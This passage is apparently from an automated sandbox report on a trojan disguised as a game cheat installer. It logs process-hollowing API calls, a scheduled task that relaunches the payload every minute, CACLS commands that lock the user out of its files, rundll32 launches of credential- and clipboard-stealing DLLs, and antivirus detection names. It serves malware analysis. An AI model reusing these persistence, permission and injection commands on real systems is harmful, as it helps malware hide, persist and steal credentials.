cmdline	cmd /k echo Y\|CACLS "bstyoops.exe" /P "test22:N"&&CACLS "bstyoops.exe" /P "test22:R" /E&&echo Y\|CACLS "..\b6ba12ff32" /P "test22:N"&&CACLS "..\b6ba12ff32" /P "test22:R" /E&&Exit
cmdline	CACLS "..\b6ba12ff32" /P "test22:N"

Executed a process and injected code into it, probably while unpacking (48 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 912	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 912	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 912	1	0
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2056 thread_handle: 0x00000270 process_identifier: 2052 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\CS-Cheat-Installer.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\CS-Cheat-Installer.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\CS-Cheat-Installer.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000274	1	1
NtGetContextThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000270	1	0
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2052 region_size: 253952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000274	1	0
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELVÈdàÎØnà@à@¨\ à°`"0OpDP O@à`.textÌÎ `.rdataàÒ@@.data¸$p^@À.rsrcà v@@.reloc`"°$x@B base_address: 0x00400000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x00401000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x0042e000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x00437000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: 0 H` }<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043a000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x0043b000 process_identifier: 2052 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2052 process_handle: 0x00000274	1	1
NtSetContextThread Aug. 28, 2023, 5:24 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4288031 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000270 process_identifier: 2052	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2052	1	0
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2240 thread_handle: 0x00000330 process_identifier: 2236 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000338	1	1
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2236	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x000001d8 suspend_count: 1 process_identifier: 2236	1	0
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2304 thread_handle: 0x00000270 process_identifier: 2300 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000274	1	1
NtGetContextThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000270	1	0
NtAllocateVirtualMemory Aug. 28, 2023, 5:24 p.m.	process_identifier: 2300 region_size: 253952 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000274	1	0
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $]üMoooBoBoBoÌoÌ oÌ5oBooºoomooRichoPELVÈdàÎØnà@à@¨\ à°`"0OpDP O@à`.textÌÎ `.rdataàÒ@@.data¸$p^@À.rsrcà v@@.reloc`"°$x@B base_address: 0x00400000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x00401000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x0042e000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x00437000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: 0 H` }<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly> base_address: 0x0043a000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: base_address: 0x0043b000 process_identifier: 2300 process_handle: 0x00000274	1	1
WriteProcessMemory Aug. 28, 2023, 5:24 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2300 process_handle: 0x00000274	1	1
NtSetContextThread Aug. 28, 2023, 5:24 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4288031 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000270 process_identifier: 2300	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000270 suspend_count: 1 process_identifier: 2300	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x0000024c suspend_count: 1 process_identifier: 2300	1	0
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2392 thread_handle: 0x00000264 process_identifier: 2388 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN bstyoops.exe /TR "C:\Users\test22\AppData\Local\Temp\b6ba12ff32\bstyoops.exe" /F filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000026c	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2448 thread_handle: 0x000001ec process_identifier: 2444 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "bstyoops.exe" /P "test22:N"&&CACLS "bstyoops.exe" /P "test22:R" /E&&echo Y\|CACLS "..\b6ba12ff32" /P "test22:N"&&CACLS "..\b6ba12ff32" /P "test22:R" /E&&Exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000254	1	1
CreateProcessInternalW Aug. 28, 2023, 5:25 p.m.	thread_identifier: 2328 thread_handle: 0x0000043c process_identifier: 2312 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\cred64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000450	1	1
CreateProcessInternalW Aug. 28, 2023, 5:25 p.m.	thread_identifier: 2476 thread_handle: 0x00000444 process_identifier: 2456 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\clip64.dll, Main filepath_r: C:\Windows\System32\rundll32.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000454	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2520 thread_handle: 0x0000008c process_identifier: 2516 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2560 thread_handle: 0x00000088 process_identifier: 2556 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "bstyoops.exe" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2612 thread_handle: 0x0000008c process_identifier: 2608 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "bstyoops.exe" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000094	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2696 thread_handle: 0x0000008c process_identifier: 2692 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cmd.exe track: 1 command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2732 thread_handle: 0x00000094 process_identifier: 2728 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\b6ba12ff32" /P "test22:N" filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000008c	1	1
CreateProcessInternalW Aug. 28, 2023, 5:24 p.m.	thread_identifier: 2800 thread_handle: 0x0000008c process_identifier: 2796 current_directory: C:\Users\test22\AppData\Local\Temp\b6ba12ff32 filepath: C:\Windows\System32\cacls.exe track: 1 command_line: CACLS "..\b6ba12ff32" /P "test22:R" /E filepath_r: C:\Windows\system32\cacls.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000090	1	1
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2556	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x0000009c suspend_count: 1 process_identifier: 2608	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x000000a0 suspend_count: 1 process_identifier: 2728	1	0
NtResumeThread Aug. 28, 2023, 5:24 p.m.	thread_handle: 0x00000098 suspend_count: 1 process_identifier: 2796	1	0
CreateProcessInternalW Aug. 28, 2023, 5:25 p.m.	thread_identifier: 2284 thread_handle: 0x000000dc process_identifier: 2296 current_directory: filepath: C:\Windows\System32\rundll32.exe track: 1 command_line: "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\c75c6c37b2d7a3\cred64.dll, Main filepath_r: C:\Windows\system32\rundll32.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x000000d8	1	1
NtResumeThread Aug. 28, 2023, 5:25 p.m.	thread_handle: 0x00000000000000fc suspend_count: 1 process_identifier: 2296	1	0

File has been identified by 44 AntiVirus engines on VirusTotal as malicious (44 events)

Lionic	Trojan.Win32.Generic.4!c
tehtris	Generic.Malware
Cynet	Malicious (score: 100)
Cylance	unsafe
Sangfor	Suspicious.Win32.Save.a
Alibaba	Trojan:MSIL/Kryptik.e573b60c
Cybereason	malicious.ef4fe0
VirIT	Trojan.Win32.MSIL_Heur.A
Cyren	W32/MSIL_Kryptik.JLU.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/Kryptik.AHUA
APEX	Malicious
Kaspersky	HEUR:Trojan-Downloader.MSIL.Deyma.gen
BitDefender	Gen:Variant.MSILHeracles.108480
MicroWorld-eScan	Gen:Variant.MSILHeracles.108480
Avast	FileRepMalware [Trj]
Emsisoft	Gen:Variant.MSILHeracles.108480 (B)
DrWeb	Trojan.Siggen21.22935
TrendMicro	Trojan.Win32.AMADEY.YXDH2Z
McAfee-GW-Edition	BehavesLike.Win32.Generic.jc
Trapmine	malicious.high.ml.score
FireEye	Generic.mg.64f1d67b14dafea7
Sophos	Generic Reputation PUA (PUA)
SentinelOne	Static AI - Malicious PE
GData	Gen:Variant.MSILHeracles.108480
Gridinsoft	Trojan.Win32.Amadey.bot
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.Deyma.gen
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
Google	Detected
AhnLab-V3	Malware/Win.Generic.C5477526
Acronis	suspicious
McAfee	Artemis!64F1D67B14DA
MAX	malware (ai score=84)
Malwarebytes	Trojan.Crypt.MSIL
TrendMicro-HouseCall	Trojan.Win32.AMADEY.YXDH2Z
Rising	Malware.Obfus/MSIL@AI.90 (RDM.MSIL2:D1ypmqrkZAX84ZWYoJ8qAw)
Ikarus	Win32.Outbreak
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	MSIL/Kryptik.AHUA!tr
BitDefenderTheta	Gen:NN.ZemsilF.36350.Pm0@aeamXOfi
AVG	FileRepMalware [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_100% (W)

CS-Cheat-Installer.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All